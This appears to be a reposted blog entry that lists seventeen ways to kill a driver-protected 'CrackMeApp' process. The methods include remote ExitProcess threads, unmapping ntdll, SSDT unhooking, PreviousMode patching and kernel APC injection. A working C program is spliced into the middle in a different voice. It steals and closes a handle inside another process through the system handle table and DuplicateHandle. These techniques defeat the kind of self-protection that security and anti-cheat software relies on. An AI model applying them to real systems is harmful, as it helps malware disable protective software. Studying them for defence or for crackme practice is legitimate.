Multiple methods to terminate a process

Source: Internet
Author: User
Tags: apc, ssdt

1. Find the process's main window with FindWindow and send it WM_CLOSE (SendMessage or PostMessage).

2. Find the process's main (UI) thread and post WM_QUIT to it with PostThreadMessage; the message loop returns and the main thread ends.

3. OpenThread ---> TerminateThread: open each thread of the process with THREAD_TERMINATE access and terminate it.

4. RemoteExitProcess: open the process with PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION (CreateRemoteThread also wants PROCESS_QUERY_INFORMATION, PROCESS_VM_WRITE and PROCESS_VM_READ) and create a remote thread whose start address is ExitProcess with parameter 0; the process exits. This works because kernel32.dll is mapped at the same base in every process, so the local address of ExitProcess is valid inside the target.

5. First make sure the process can be opened (see methods 8 and 9), then create a thread that calls DebugActiveProcess on it, and let the debugger exit without calling DebugActiveProcessStop. Kill-on-exit is the default for a debuggee, so it is terminated along with its debugger and you never have to handle a single debug event ~

6. Open the process with PROCESS_VM_OPERATION and call NtUnmapViewOfSection to unmap its ntdll.dll. Nothing crashes yet; now send it any message at all. The next time it calls into ntdll, or raises an exception (user-mode exception dispatch lives in ntdll, which is gone), it faults and cannot recover, so it dies on its own ~ (I think this is essentially the same as writing junk data into the process's address space.)

7. Inject an ESC keypress (keybd_event/SendInput) so the dialog closes itself. This goes through the input system and is not the same as sending a window message.

8. The following is the highlight: -----------------------------
Because CrackMeApp holds an open handle to the driver's device, the driver cannot be unloaded directly; that handle has to be closed first.
So how do we get at a handle that lives in another process? The first thing that comes to mind is DuplicateHandle:
BOOL DuplicateHandle (
HANDLE hSourceProcessHandle, // handle to source process
HANDLE hSourceHandle, // handle to duplicate
HANDLE hTargetProcessHandle, // handle to target process
LPHANDLE lpTargetHandle, // duplicate handle
DWORD dwDesiredAccess, // requested access
BOOL bInheritHandle, // handle inheritance option
DWORD dwOptions // optional actions
);

First look at the last parameter:
DUPLICATE_CLOSE_SOURCE
Closes the source handle. This occurs regardless of any error status returned.
DUPLICATE_SAME_ACCESS
Ignores the dwDesiredAccess parameter. The duplicate handle has the same access as the source handle.

That is, with DUPLICATE_CLOSE_SOURCE the remote handle is closed automatically.

The first parameter comes straight from OpenProcess(PROCESS_DUP_HANDLE, FALSE, pid).
The second parameter is the hard one: it is the driver handle inside the CrackMeApp process. To find it we use ZwQuerySystemInformation from ntdll.dll, which with the SystemHandleInformation class returns every handle in the system. We walk the whole list and keep the entries whose ProcessId is CrackMeApp's and whose ObjectTypeNumber is the File type. See my implementation code for the details.

typedef struct _SYSTEM_HANDLE_INFORMATION { // Information Class 16
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags; // 0x01 = PROTECT_FROM_CLOSE, 0x02 = INHERIT
    USHORT Handle;
    PVOID Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

This finds every handle CrackMeApp opened with CreateFile. Usually there are three; we can close them all, or just the last one, because the driver is opened by the last CreateFile call, so its handle is the last File entry for that process. (The buffer ZwQuerySystemInformation returns is a ULONG handle count followed by an array of these entries, and ObjectTypeNumber values differ between Windows versions, so check them on the target system.)


Now we have the second parameter; the remaining parameters are easy ~

So a single DuplicateHandle call both closes the remote handle and hands us our own handle to the driver ~~

My 8th method, then, is to send an I/O control request through that handle to CrackMeApp's driver, asking it to set the protected PID to 0. After that the conventional method (OpenProcess + TerminateProcess) works.

9. Once the remote handle has been closed as above, the driver can be unloaded ~ so call ZwUnloadDriver, or stop its service. Then finish with the conventional method ~~

10. Alternatively, use the process handle that csrss.exe holds and dup that. The DUP procedure is the same as above, except that the process to match is csrss and the type is 5 (the Process handle type). For each process handle, call ZwQueryInformationProcess with ProcessBasicInformation (class 0) and check whether the UniqueProcessId is CrackMeApp's; if it is, use that handle directly with TerminateProcess ~
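The handle search that methods 8, 9 and 10 share, as an added example that is neither the post's nor its author's code: it walks a SystemHandleInformation (class 16) buffer laid out as on the page, keeps the handles one PID holds on one object type (skipping PROTECT_FROM_CLOSE entries, which cannot be closed), and on Windows closes the chosen one inside the target with DuplicateHandle(DUPLICATE_CLOSE_SOURCE) while keeping a local copy. The walker is plain C and runs offline against a constructed sample table; the Windows glue is compiled only under _WIN32. The type indexes used (File = 28, Process = 5) are the XP-era values and are an assumption, as is the constructed sample data; on newer systems read the indexes from the target. For method 10 the same program is run with the csrss PID and type 5, and the ProcessBasicInformation query on each stolen handle is left to the caller.

```c
/* Added example, not the post's code: walk a SystemHandleInformation table,
 * pick the handles one process holds on one object type, and on Windows close
 * the chosen one inside that process while keeping a local copy (methods 8-10).
 * Assumption: XP-era type indexes, File = 28 and Process = 5. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* One class-16 entry as on the page. ProcessId overlaps the USHORT UniqueProcessId
 * + USHORT CreatorBackTraceIndex of newer headers; PIDs > 0xFFFF need class 64. */
typedef struct {
    uint32_t ProcessId;
    uint8_t  ObjectTypeNumber;
    uint8_t  Flags;                 /* 0x01 = PROTECT_FROM_CLOSE, 0x02 = INHERIT */
    uint16_t Handle;
    void    *Object;
    uint32_t GrantedAccess;
} HANDLE_ENTRY;
typedef struct {                    /* the returned buffer: a count, then entries */
    uint32_t     NumberOfHandles;
    HANDLE_ENTRY Handles[1];
} HANDLE_TABLE;
/* Copy into out (table order) the handles that belong to pid, have type type_no and
 * are not PROTECT_FROM_CLOSE (unclosable, so DUPLICATE_CLOSE_SOURCE would leave
 * them open); return the total count even when it exceeds max_out. */
size_t find_handles(const HANDLE_TABLE *tbl, uint32_t pid, uint8_t type_no,
                    uint16_t *out, size_t max_out)
{
    size_t n = 0;
    for (uint32_t i = 0; i < tbl->NumberOfHandles; i++) {
        const HANDLE_ENTRY *e = &tbl->Handles[i];
        if (e->ProcessId != pid || e->ObjectTypeNumber != type_no || (e->Flags & 0x01))
            continue;
        if (n < max_out) out[n] = e->Handle;
        n++;
    }
    return n;
}
/* The last match, 0 if none: the driver device is opened by the last CreateFile. */
uint16_t last_handle(const HANDLE_TABLE *tbl, uint32_t pid, uint8_t type_no)
{
    uint16_t hs[256];
    size_t n = find_handles(tbl, pid, type_no, hs, 256);
    return (n && n <= 256) ? hs[n - 1] : 0;
}
/* Constructed sample snapshot, not a real capture: PID 1234 holds three
 * closable File handles, one protected File handle and one Process handle. */
static const struct { uint32_t n; HANDLE_ENTRY h[6]; } sample = { 6, {
    { 1234, 28, 0x00, 0x40, NULL, 0x00120089 },
    { 1234,  5, 0x00, 0x4C, NULL, 0x001F0FFF },
    { 1234, 28, 0x01, 0x5C, NULL, 0x00120089 },   /* PROTECT_FROM_CLOSE */
    { 1234, 28, 0x00, 0x64, NULL, 0x0012019F },
    { 4321, 28, 0x00, 0x70, NULL, 0x00120089 },
    { 1234, 28, 0x00, 0x74, NULL, 0x001F01FF },   /* last CreateFile: the driver */
} };
const HANDLE_TABLE *sample_table(void) { return (const HANDLE_TABLE *)&sample; }

#ifdef _WIN32
#include <windows.h>
typedef long (WINAPI *NtQSI_t)(unsigned long, void *, unsigned long, unsigned long *);
/* Snapshot every handle in the system (class 16), doubling the buffer while
 * ntdll returns STATUS_INFO_LENGTH_MISMATCH (0xC0000004); caller frees. */
HANDLE_TABLE *snapshot_handles(void)
{
    NtQSI_t qsi = (NtQSI_t)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                          "NtQuerySystemInformation");
    unsigned long size = 1u << 15; void *buf = NULL, *p; long st;
    if (!qsi) return NULL;
    do {
        size *= 2;
        if (!(p = realloc(buf, size))) { free(buf); return NULL; }
        buf = p; st = qsi(16, buf, size, NULL);
    } while (st == (long)0xC0000004L);
    if (st < 0) { free(buf); return NULL; }
    return (HANDLE_TABLE *)buf;
}
/* Close handle h inside process pid and keep our own copy; the source is
 * closed whether or not the duplication succeeds. */
HANDLE steal_handle(DWORD pid, uint16_t h)
{
    HANDLE proc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pid), mine = NULL;
    if (proc && !DuplicateHandle(proc, (HANDLE)(uintptr_t)h, GetCurrentProcess(),
                &mine, 0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE))
        mine = NULL;
    if (proc) CloseHandle(proc);
    return mine;
}
int main(int argc, char **argv)      /* usage: steal <pid> [type index, default 28] */
{
    DWORD pid = argc > 1 ? strtoul(argv[1], NULL, 0) : 0;
    uint8_t type_no = argc > 2 ? (uint8_t)strtoul(argv[2], NULL, 0) : 28;
    HANDLE_TABLE *tbl = pid ? snapshot_handles() : NULL;
    uint16_t h = tbl ? last_handle(tbl, pid, type_no) : 0;
    HANDLE mine = h ? steal_handle(pid, h) : NULL;   /* what DeviceIoControl takes */
    free(tbl);
    printf("remote handle 0x%x -> local copy %p\n", h, (void *)mine);
    return mine ? 0 : 1;
}
#endif
```

The local copy returned by steal_handle is what DeviceIoControl takes for method 8 (the IOCTL code is the driver's own and is not given on the page). For method 9 remember that the duplicate keeps the device open: close the local copy as well before calling ZwUnloadDriver or stopping the service. Note also that DUPLICATE_CLOSE_SOURCE closes the remote handle even when the duplication itself fails, so a NULL result does not mean the target still holds it.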

--------------- The following methods use a driver -----------

11. Use a driver to patch the protected-PID value (to 0), then use the conventional method from user mode ~

12. Use a driver to restore the original ZwOpenProcess entry in the SSDT. Here I was lazy and hard-coded the call into the driver's SSDT-restore routine ~~ Then the conventional method from user mode (this is not the same as 11).

13. Call NtOpenProcess directly from the driver, bypassing its SSDT hook. You must first set PreviousMode in the KTHREAD to KernelMode, otherwise the call can fail: with PreviousMode == UserMode the pointer probes reject kernel-mode addresses ~
Once you have the handle, call ZwTerminateProcess; no PreviousMode change is needed there, because the Zw stub sets it for you ~

14. Differs from method 13 only in how the handle is obtained: PsLookupProcessByProcessId + ObOpenObjectByPointer, then ZwTerminateProcess ~ (This should count as different, since the rules once said that the Ob* and Nt* routines are different APIs.)

15. Finally, get the TID of a CrackMeApp thread, get its ETHREAD with PsLookupThreadByThreadId, and queue an APC to that thread. The APC routine's main job is to call ZwTerminateProcess((HANDLE)-1, 0); since the APC runs in the target's context, the process terminates itself (hey, this method comes from IceSword) ~~ Originally I wanted to call Nt/ZwTerminateThread, but I would have had to locate that function myself, so I simply used ZwTerminateProcess.

16. Memory clearing method

http://hi.baidu.com/%C3%F7%ED%F8%B5%C4%D0%C4/blog/item/255cd583fe406698f603a6f2.html

17. Job termination

ZwOpenProcess -> ZwCreateJobObject -> ZwAssignProcessToJobObject -> ZwTerminateJobObject (the process handle must carry PROCESS_SET_QUOTA | PROCESS_TERMINATE access for the assignment to succeed)
